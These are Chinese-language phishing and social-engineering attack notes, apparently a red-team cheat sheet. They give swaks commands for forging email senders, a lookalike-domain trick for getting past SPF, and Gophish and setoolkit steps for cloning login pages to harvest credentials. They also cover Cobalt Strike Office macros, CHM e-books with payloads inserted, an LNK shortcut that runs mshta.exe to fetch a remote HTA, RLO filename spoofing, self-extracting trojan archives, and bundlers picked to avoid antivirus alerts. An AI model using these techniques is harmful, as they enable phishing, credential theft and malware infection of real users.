邮件伪造
SPF
发件人策略框架,电子邮件认证机制
如何判断
dig -t txt qq.com
nslookup -type=txt qq.com
"v=spf1 -all" (拒绝所有,表示这个域名不会发出邮件)
"v=spf1 +all" (接受所有)
"v=spf1 ip4:192.168.0.1/16 -all" (只允许 192.168.0.1/16 范围内的IP发送邮件)
"v=spf1 mx-all" (允许当前域名的 mx记录对应的IP地址发送邮件)
"v=spf1 mx mx:test.example.com -all" (允许当前域名和test.example.com 的mx记录对应的IP地址发送邮件)
"v=spf1 a mx ip4:173.194.72.103 -all" (允许当前域名的 a 记录和 mx 记录和一个给定的IP地址发送邮件)
"v=spf1 include:example.com -all" (采用和 example.com 一样的SPF记录)
- 如果存在SPF,会检测发送的域名
- 不存在SPF,可以伪造发件人,实现钓鱼攻击
伪造
无SPF
swaks --header-X-Mailer "" --header-Message-Id "" --header-"Content-Type"="text/html" --from "安全测试部" --ehlo shabimeiquo -header "Subject:测试" --body 我们做了一个测试 --to ivcdnvmooq@iubridge.com
有SPF
软刚发信人:(修改字眼)
简单来说就是system@notice.aliyun.com是正常的做了SPF的域名,只要修改这个域名让他不是notice.aliyun.com比如加个.cn就可以绕过了
硬刚发信人:(转发突破)
注册一个邮箱开启POP3转发
使用网上已知的邮箱系统
1、将要发送的邮件导出EML模版 2、修改内置的发件人内容时间等
swaks --to 收信人 -f 发信人 --data 1.eml --server smtp.163.com -p 25 -au 帐号 -ap 授权码
Gophish
- 配置发件接口(自定义)
- 配置发信模版(更逼真)
- 配置触发页面(钓鱼用)
- 配置收信人地址(批量套)
网址克隆
工具
setoolkit克隆
# 启动SET
setoolkit
# 选择社会工程学攻击
1
# 选择网站攻击向量
2
# 选择凭证收集攻击
3
# 选择站点克隆器
2
# 输入要克隆的网址,例如:
https://example.com/login
Gobin
支持反向代理,可以隐藏自己
代码修改
显示二维码url地址
- 钓鱼页面的二维码,来源是由攻击方二维码产生
- 修改钓鱼页面,固定好攻击方的二维码url路径
- 攻击方的二维码,来源是由钓鱼页面的二维码产生的
木马伪装
office宏对象
生成
Attacks-->Packages-->MS offices Macro
- 启动宏代码的后缀
.docm、xlsm、pptm - 所有版本都兼容
.doc、xls、ppt
officeCVE利用
缺点:必须特定版本才行 优点:无需宏确认,直接就能用
CHM电子书
- 找一个正常的CHM电子书,解压
- 将payload插入其中或整个页面中
- 加载编译,当电子书打开修改页面后上线
解压命令 hh -decompile .\\html xx.CHM
LNK快捷方式
- 生成:
Attacks->Packages->Html Application - 上传:
Attack->Web Drive by->Host file - 执行
C:\Windows\System32\mshta.exe http://xxx.xxx.xxx/x.ext - 伪装
- 创建快捷方式
- 生成HTA并上传
- 属性更改目标执行
- 属性更改图标伪装
exe隐藏
RLO更改后缀
经过免杀后的exe程序(xgpj.exe),进行重命名,在gpl位置插入Unicode控制字符,RLO(从左到右覆盖)
压缩包自解压
对压缩包设置自解压,可以自己主动释放木马,控制下载机,同时也要结合RLO进行后缀隐藏
文件捆绑
需要注意的点:
通过测试发现,普通文件rar进行压缩释放,安全软件不会报毒,但是如果是一些其他个人开发的捆绑压缩工具,安全软件会报毒,所以一般选用白名单的工具(不会报毒的捆绑工具)